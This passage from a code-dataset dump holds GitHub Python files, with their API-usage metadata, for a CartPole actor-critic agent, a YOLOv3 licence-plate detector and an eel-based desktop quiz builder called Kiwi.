"call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 167, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 169, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 180, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 188, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 192, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 204, "usage_type": "call"}, {"api_name": "paramiko.SSHClient", "line_number": 215, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 216, "usage_type": "call"}, {"api_name": "paramiko.AuthenticationException", "line_number": 218, "usage_type": "attribute"}, {"api_name": "paramiko.SSHException", "line_number": 221, "usage_type": "attribute"}, {"api_name": "socket.timeout", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 246, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 252, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 253, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 256, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 261, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 261, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 275, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 276, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 285, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 287, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 287, "usage_type": "name"}, {"api_name": "socket.timeout", "line_number": 290, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 291, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 293, "usage_type": "call"}, {"api_name": "paramiko.buffered_pipe.PipeTimeout", "line_number": 294, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 295, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 297, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 299, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 302, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 304, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 314, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path", "line_number": 325, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 326, "usage_type": "call"}, {"api_name": "os.path", "line_number": 326, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 327, "usage_type": "call"}, {"api_name": "os.makedirs", 
"line_number": 329, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 330, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 334, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 342, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 357, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 376, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 414, "usage_type": "call"}, {"api_name": "getpass.getpass", "line_number": 419, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 424, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 424, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 425, "usage_type": "call"}, {"api_name": "common.baseaccess.getaccess", "line_number": 429, "usage_type": "call"}, {"api_name": "common.baseaccess", "line_number": 429, "usage_type": "name"}, {"api_name": "itpii.baseaccess", "line_number": 432, "usage_type": "call"}, {"api_name": "startpvc_auto.auto_main", "line_number": 438, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 441, "usage_type": "call"}]} +{"seq_id": "111041884", "text": "import torch\nfrom torch import nn\nfrom torch import optim\nimport numpy as np\nfrom torch.nn import functional as F\nimport gym\nimport torch.multiprocessing as mp\n\n\nclass ActorCritic(nn.Module):\n def __init__(self):\n super(ActorCritic, self).__init__()\n self.l1 = nn.Linear(4,25)\n self.l2 = nn.Linear(25,50)\n self.actor_lin1 = nn.Linear(50,2)\n self.l3 = nn.Linear(50,25)\n self.critic_lin1 = nn.Linear(25,1)\n def forward(self,x):\n x = F.normalize(x,dim=0)\n y = F.relu(self.l1(x))\n y = F.relu(self.l2(y))\n actor = F.log_softmax(self.actor_lin1(y),dim=0) # Returns log probs over the two actions\n c = F.relu(self.l3(y.detach()))\n critic = torch.tanh(self.critic_lin1(c)) # Returns values between -1 and 1\n return actor, critic\n \n\ndef worker(t, worker_model, counter, params):\n worker_env = gym.make(\"CartPole-v1\")\n worker_env.reset()\n worker_opt = optim.Adam(lr=1e-4,params=worker_model.parameters()) # Each worker has own environment and optimizer\n worker_opt.zero_grad()\n for i in range(params['epochs']):\n worker_opt.zero_grad()\n values, logprobs, rewards = run_episode(worker_env,worker_model) #B plays one episode\n actor_loss,critic_loss, eplen = update_params(worker_opt,values,logprobs,rewards) # Use collected data to run one update step\n counter.value = counter.value + 1 # Globally shared counter\n\n\ndef run_episode(worker_env, worker_model):\n state = torch.from_numpy(worker_env.env.state).float() # Converts state to tensor\n values, logprobs, rewards = [], [], []\n done = False\n j=0\n while not done:\n j+=1\n policy, value = worker_model(state) # Computes state value and log probs over actions\n values.append(value)\n logits = policy.view(-1) # Flattens\n action_dist = torch.distributions.Categorical(logits=logits)\n action = action_dist.sample() # Samples from action probability distribution\n logprob_ = policy.view(-1)[action]\n logprobs.append(logprob_)\n state_, _, done, _ = worker_env.step(action.detach().numpy())\n state = torch.from_numpy(state_).float()\n if done:\n reward = -10\n worker_env.reset()\n else:\n reward = 1.0\n rewards.append(reward)\n return values, logprobs, rewards\n\n\ndef update_params(worker_opt,values,logprobs,rewards,clc=0.1,gamma=0.95):\n rewards = torch.Tensor(rewards).flip(dims=(0,)).view(-1) # Reverse and flatten\n logprobs = 
torch.stack(logprobs).flip(dims=(0,)).view(-1)\n values = torch.stack(values).flip(dims=(0,)).view(-1)\n Returns = []\n ret_ = torch.Tensor([0])\n for r in range(rewards.shape[0]): # Compute return values\n ret_ = rewards[r] + gamma * ret_\n Returns.append(ret_)\n Returns = torch.stack(Returns).view(-1)\n Returns = F.normalize(Returns,dim=0)\n actor_loss = -1*logprobs * (Returns - values.detach()) # Prevent backprop through critic head\n critic_loss = torch.pow(values - Returns,2)\n loss = actor_loss.sum() + clc*critic_loss.sum() # sum both losses to get overall loss. scale critic loss to ensure critic learns slower\n loss.backward()\n worker_opt.step()\n return actor_loss, critic_loss, len(rewards)\n\n\nif __name__ == '__main__':\n MasterNode = ActorCritic() # Shared AC model\n MasterNode.share_memory() # Allows params to be shared accross processes\n processes = []\n params = {\n 'epochs':1000,\n 'n_workers':7,\n }\n\n counter = mp.Value('i',0) # Shared global counter\n for i in range(params['n_workers']):\n p = mp.Process(target=worker, args=(i,MasterNode,counter,params)) # Starts new process that runs a worker\n p.start() \n processes.append(p)\n for p in processes: # Joins each process to wait for it to finish before returning to main function\n p.join()\n for p in processes:\n p.terminate()\n \n print(counter.value,processes[1].exitcode)\n\n # eval\n env = gym.make(\"CartPole-v1\")\n env.reset()\n\n for i in range(100):\n state_ = np.array(env.env.state)\n state = torch.from_numpy(state_).float()\n logits,value = MasterNode(state)\n action_dist = torch.distributions.Categorical(logits=logits)\n action = action_dist.sample()\n state2, reward, done, info = env.step(action.detach().numpy())\n if done:\n print(\"Lost\")\n env.reset()\n state_ = np.array(env.env.state)\n state = torch.from_numpy(state_).float()\n env.render()", "repo_name": "unit0113/projects", "sub_path": "ML/RL/cart_pole_mc_ac.py", "file_name": "cart_pole_mc_ac.py", "file_ext": "py", "file_size_in_byte": 4651, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 22, "usage_type": 
"call"}, {"api_name": "torch.nn.functional", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 24, "usage_type": "call"}, {"api_name": "gym.make", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.pow", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.multiprocessing.Value", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.multiprocessing.Process", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 95, "usage_type": "name"}, {"api_name": "gym.make", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.distributions.Categorical", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "74288694564", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport main\n\n\n# In[2]:\n\n\nnet = cv2.dnn.readNetFromDarknet(\"yolov3_custom.cfg\", r\"yolov3_custom_2000.weights\")\n\n\n# In[3]:\n\n\ndef show(img):\n print(img.shape)\n plt.imshow(img)\n plt.show()\n\n\n# In[4]:\n\n\nclasses = ['licence']\n\n\n# In[5]:\n\n\n#img = cv2.imread('image4.jpg')\n\n\n# In[7]:\n\n\ndef locateLP(img):\n hight,width,_ = img.shape\n\n blob = cv2.dnn.blobFromImage(img, 1/255,(416,416),(0,0,0),swapRB = True,crop= False)\n net.setInput(blob)\n output_layers_name = net.getUnconnectedOutLayersNames()\n\n layerOutputs = net.forward(output_layers_name)\n\n\n boxes =[]\n confidences = []\n class_ids = []\n\n for output in layerOutputs:\n for detection in output:\n score = detection[5:]\n class_id = np.argmax(score)\n confidence = score[class_id]\n if confidence > 0.5:\n #print(confidence)\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * hight)\n w = int(detection[2] * width)\n h = int(detection[3] * hight)\n x = int(center_x - w/2)\n y = int(center_y - h/2)\n boxes.append([x, y, w, h])\n confidences.append((float(confidence)))\n 
class_ids.append(class_id)\n    indexes = cv2.dnn.NMSBoxes(boxes, confidences, .8, .4)\n    #print(indexes)\n    ans = []\n    #detectedimg = img.copy()\n    #font = cv2.FONT_HERSHEY_PLAIN\n    if len(indexes)>0:\n        for i in indexes.flatten():\n            # x,y,w,h = boxes[i]\n            ans.append(boxes[i])\n            # label = str(classes[class_ids[i]])\n            # confidence = str(round(confidences[i],2))\n            # color = (255,255,255)\n            # cv2.rectangle(detectedimg,(x,y),(x+w,y+h),color,10)\n            # cv2.putText(detectedimg,label + \" \" + confidence, (x,y+400),font,2,color,2)\n            # show(detectedimg)\n    \n    ans = np.array(ans)\n    return ans\n\n\ndef final_img_and_number(img):\n    ans = locateLP(img)\n\n    PlateNumber = []\n    new = img.copy()\n    for i in ans:\n        x, y, w, h = i\n        #x, y, w, h = ans[0][0], ans[0][1], ans[0][2], ans[0][3]\n        cv2.rectangle(new, (x, y), (x + w, y + h), (255, 255, 255), 5)\n        #number, segments = main.PlateRecognition(img[y:y + h, x:x + w])\n        #FinalImage.append(new)\n        #PlateNumber.append(number)\n\n    return new, PlateNumber  # PlateNumber stays empty while PlateRecognition is commented out; __main__ unpacks two values\n\n\nif __name__ == '__main__':\n    img = cv2.imread('ps2/ps2/test_multipleCar/p3.png')\n    ans, PlateNumber = final_img_and_number(img)\n    show(ans)\n    for i in PlateNumber:\n        print(i)", "repo_name": "shriyanshibhadada/-license-plate-recognizer", "sub_path": "DetectPlates.py", "file_name": "DetectPlates.py", "file_ext": "py", "file_size_in_byte": 2693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.dnn.readNetFromDarknet", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.dnn.NMSBoxes", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "8923621679", "text": "import random, os, shutil, json\n\n#Package install if necessary\nprint(\"Checking packages...\")\nwith open('package.json', 'r') as f:\n    packages = json.load(f)\n    for (k,v) in packages.items():\n        if v == False:\n            print(f'{k} may not be installed. Downloading it to your system. 
Installer: pip')\n os.system(f'pip install {k}')\n packages[k] = True\n\nwith open('package.json', 'w') as f:\n json.dump(packages, f, indent=2)\n\nimport wx\nimport eel\nimport requests\n\neel.init(\"web\") #Initialise front end files from web dir\nDESKTOP_PATH = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\n\n#Clear images folder by deleting full tree followed by mkdir\nif os.path.exists('web/images'):\n shutil.rmtree('web/images')\n\nos.mkdir('web/images')\n\n#Clear stylesheet from previous build if somehow exists\nif os.path.exists('./style.css'):\n os.remove('./style.css')\n\ndef copytree(src, dst, symlinks=False, ignore=None):\n \"\"\"\n Generously inspired by StackOverflow as shutil.copytree doesn't really work.\n Copy file contents from src to dst, both str path inputs\n \"\"\"\n for item in os.listdir(src):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s):\n shutil.copytree(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n@eel.expose\ndef findImagePath(wildcard=\"*\"):\n \"\"\"\n Opens a file dialog to select an image from user's file system, copies the image to the web/images dir and returns that path.\n No inputs, but optional to change wildcard input (default *).\n \"\"\"\n\n app = wx.App(None) #Necessary to open filedialog!!\n style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST\n dialog = wx.FileDialog(None, 'Open', wildcard=wildcard, style=style) #File dialog window\n if dialog.ShowModal() == wx.ID_OK:\n path = dialog.GetPath() #Get path from chosen file\n else:\n path = None\n dialog.Destroy()\n\n newDest = os.path.join('web/images/', os.path.basename(path)) #Create new path to image folder in web/\n shutil.copy(path, newDest) #Copy chosen image over\n\n return newDest\n\n@eel.expose\ndef getQuestionHTML(fileName):\n \"\"\"\n Very basic - opens a given HTML file and reads its contents to one string, encoded to utf-8, input\n \n - fileName (str): file path to open\n\n Returns read file as string. 
Obviously will not work if file is unreadable or cannot be extracted using Python func .read()\n    \"\"\"\n    with open(fileName, 'r', encoding='utf-8') as f:\n        asString = f.read()\n\n    return asString\n\n@eel.expose\ndef getTemplateHTML(questionNumber):\n    \"\"\"\n    Opens the correct HTML snippet for the given question and replaces the contents with the quiz data, input\n\n    - questionNumber (str): Question to unpack (REMEMBER THIS STARTS AT '1'), also used as key in quizMap object\n\n    Returns the HTML slide for the given question (this is the slide preview) as one string\n    \"\"\"\n\n    try: #quizMap exists, no question data\n        if len(list(quizMap[questionNumber]['details'].keys())) < 1: #Loading in a blank template/unsaved question, nothing to return, avoids errors thrown\n            return 'Build and save a question to see the slide!'\n    except (NameError, KeyError) as e: #First/second stage error, no quizMap object yet or no question key yet\n        return 'Build and save a question to see the slide!'\n\n\n    with open('web/snippets/template.html', 'r', encoding='utf-8') as f: #Read in slide template\n        asString = f.read()\n\n    try:\n        asString = asString.replace('[IMAGE]', quizMap[questionNumber]['imagePath']) #Add image path to template\n    except KeyError:\n        asString = asString.replace('<img src=\"[IMAGE]\">', '') #No image selected, thus no 'imagePath' key, remove the placeholder tag (tag reconstructed here; the markup was stripped from this copy, so exact attributes are assumed)\n\n    #Replace question placeholder and get question type (MCQ/TF/Input)\n    asString = asString.replace('[QUESTION]',quizMap[questionNumber]['details']['question'])\n    qType = quizMap[questionNumber]['questionType']\n\n    #Basically a switch case to replace necessary elements for each one\n    if qType == 'TrueFalse':\n        with open('web/snippets/widgets/tf.html', 'r', encoding='utf-8') as f: #Read in true false html\n            widget = f.read()\n\n        asString = asString.replace('[INSERTS]', widget)\n    elif qType == 'Input':\n        with open('web/snippets/widgets/input.html', 'r', encoding='utf-8') as f: #Read in input html\n            widget = f.read()\n\n        asString = asString.replace('[INSERTS]', widget)\n        asString = asString.replace('[SUFFIX]', quizMap[questionNumber]['details']['answerSuffix'])\n        asString = asString.replace('[ANSWERTYPE]', quizMap[questionNumber]['details']['answerType'])\n    elif qType == 'MCQ':\n        with open('web/snippets/widgets/mcq.html', 'r', encoding='utf-8') as f: #Read in mcq html\n            widget = f.read()\n\n        questions = [quizMap[questionNumber]['details']['correctAnswer'],\n                    quizMap[questionNumber]['details']['option2'],\n                    quizMap[questionNumber]['details']['option3']] #Build array of MCQ answers and shuffle them\n        random.shuffle(questions)\n\n        for i in range(3):\n            widget = widget.replace(f'[OPTION{i+1}]', questions[i]) #Put the questions in the slide HTML\n\n        asString = asString.replace('[INSERTS]', widget)\n\n    return asString\n\n@eel.expose\ndef getSlideCSS():\n    \"\"\"\n    Unpacks the editable slide css and puts it in the Kiwi editor ready for users to directly edit slide appearance.\n    Returns the portion of the example template stylesheet for slide CSS, starting on the line '.slide, .endSlide {'\n    \"\"\"\n\n    with open('example/style.css', 'r') as f:\n        styles = f.read()\n\n    startLocation = styles.find('.slide, .endSlide') #Skip to just slide CSS\n\n    return styles[startLocation:]\n\n@eel.expose\ndef saveNewStylesheet(newStyles):\n    \"\"\"\n    Takes user's input css styles for the slides and generates a new stylesheet for the output; input\n\n    - newStyles (str): Style rules for the slides taken from the front end\n\n    The stylesheet is NOT packaged into the output here; that is in 
packageQuiz()\n    \"\"\"\n\n    with open('example/style.css', 'r') as f:\n        styles = f.read()\n\n    endLocation = styles.find('.slide, .endSlide') #Skip to just slide CSS\n    newSheet = styles[:endLocation] + newStyles\n\n    #Save new stylesheet\n    with open('style.css', 'w') as f:\n        f.write(newSheet)\n\n@eel.expose\ndef generateMap(number):\n    \"\"\"\n    Either updates the quizMap object to add new questions, or initialises a blank one.\n    A new one is initialised if 'quizMap' cannot be found in the global variables; input\n\n    - number (str): Number of questions to initialise in the quizMap. If there are already questions in the quiz map,\n    these should not be affected; it will remove down to the number or add blank questions beyond the ones that already exist\n\n    No return, but prints quizMap to console (mainly for debugging)\n    \"\"\"\n    global quizMap\n\n    if 'quizMap' in list(globals()):\n        mapKeys = list(quizMap.keys()) #Questions already in quizMap\n        totalKeys = len([i for i in mapKeys if i not in ['quizName', 'passMark', 'questionTotal']]) #Ignore these keys, tally total\n\n        if int(number) > totalKeys:\n            for i in range(totalKeys+1, int(number)+1):\n                quizMap[f'{i}'] = {'questionType': '', 'details': {}} #Add new blank questions if more than already existing\n\n        elif int(number) < totalKeys:\n            for i in range(int(number)+1, totalKeys+1): #Trim down to number of questions if some removed, use del operator\n                del quizMap[f'{i}']\n\n    #quizMap object doesn't exist yet, make new blank with given number of questions\n    else:\n        quizMap = {}\n        for i in range(1, int(number)+1):\n            quizMap[f'{i}'] = {'questionType': '', 'details': {}}\n\n    print(quizMap) #Print for debug\n\n@eel.expose\ndef packageQuiz():\n    \"\"\"\n    Uses the example/ folder to actually build the quiz from the content sent through the frontend, packaging it into a folder\n    in the KiwiOutput folder generated on the user's desktop. quizMap object gets saved to external JSON while writing the quiz,\n    this is unpacked and added to the JS script in output. No inputs.\n    \"\"\"\n    #Check for output path on Desktop\n    deskPath = f'{DESKTOP_PATH}/KiwiOutput'\n    if (os.path.exists(deskPath) == False):\n        os.mkdir(deskPath)\n\n    #Dir for quiz file\n    outPath = f'{deskPath}/{quizMap[\"quizName\"]}'\n    if os.path.exists(outPath):\n        shutil.rmtree(outPath) #os.rmdir only removes empty folders; rmtree clears the previous build\n    \n    os.mkdir(outPath) #We're overwriting! 
Be aware\n\n #Copy images dir\n os.mkdir(f'{outPath}/images')\n for i in os.listdir('web/images'):\n shutil.copy2(os.path.join('web/images',i), f'{outPath}/images')\n\n #Rewrite script to add quizContext in example\n with open('example/script.js', 'r') as fjs:\n lineList = fjs.readlines()\n with open('QM.json', 'r') as fjson:\n toAdd = json.load(fjson)\n\n for ind, l in enumerate(lineList):\n if 'const quizContext' in l:\n lineList[ind] = f\"const quizContext = {toAdd};\\n\" #Actually replace the context\n\n #Turn to one string and minify, then write\n minifyAPI = 'https://www.toptal.com/developers/javascript-minifier/raw' #API handling it\n minified = requests.post(minifyAPI, data=dict(input=''.join(lineList))).text\n with open('script.js', 'w') as f:\n f.write(minified)\n\n copytree('./example', outPath)\n shutil.copy2('./script.js', outPath) #Replace with new script\n os.remove('./script.js')\n\n #If user edited stylesheet, copy that over and delete\n if os.path.exists('./style.css'):\n shutil.copy2('./style.css', outPath)\n os.remove('./style.css')\n\n#Simple getters/setters for accessing questions in the QuizMap object and communicating with the JS\n@eel.expose\ndef setGeneralDetails(key, value):\n quizMap[key] = value\n\n with open('QM.json', 'w') as f:\n json.dump(quizMap, f, indent=2) #Write quizMap object to external file QM.json simultaneously (avoid dataloss/used later to package quiz)\n\n@eel.expose\ndef setQuestion(number, key, value):\n if key == 'imagePath':\n quizMap[number][key] = os.path.relpath(value, 'web') #Need relative path here not given value\n else:\n quizMap[number][key] = value\n\n@eel.expose\ndef setQuestionDetails(number, key, value):\n quizMap[number]['details'][key] = value\n\n with open('QM.json', 'w') as f:\n json.dump(quizMap, f, indent=2) #Write quizMap object to external file QM.json simultaneously (avoid dataloss/used later to package quiz)\n \n@eel.expose\ndef getQuestion(number):\n return quizMap[number]\n\nif __name__ == '__main__':\n eel.start(\"index.html\", size=(1300, 850), port=8080) #Other programs such as MAGI default to 8000, this allows synchronous running", "repo_name": "ewanmiles/Kiwi", "sub_path": "workspace/Kiwi.py", "file_name": "Kiwi.py", "file_ext": "py", "file_size_in_byte": 10936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 6, "usage_type": "call"}, {"api_name": "os.system", "line_number": 10, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 14, "usage_type": "call"}, {"api_name": "eel.init", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 25, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 31, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "shutil.copytree", "line_number": 42, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 44, "usage_type": "call"}, {"api_name": "wx.App", "line_number": 53, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.FD_FILE_MUST_EXIST", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 55, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 62, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 63, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 46, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 67, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 130, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 81, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 139, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 153, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path", "line_number": 220, "usage_type": "attribute"}, {"api_name": "os.rmdir", "line_number": 221, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 223, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 226, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 227, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 234, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 242, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 247, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 251, "usage_type": "call"}, {"api_name": "os.path", "line_number": 251, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 252, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 253, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 206, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 261, "usage_type": "call"}, {"api_name": "eel.expose", "line_number": 256, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 266, "usage_type": "call"}, {"api_name": "os.path", "line_number": 266, "usage_type": "attribute"}, {"api_name": "eel.expose", "line_number": 263, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 
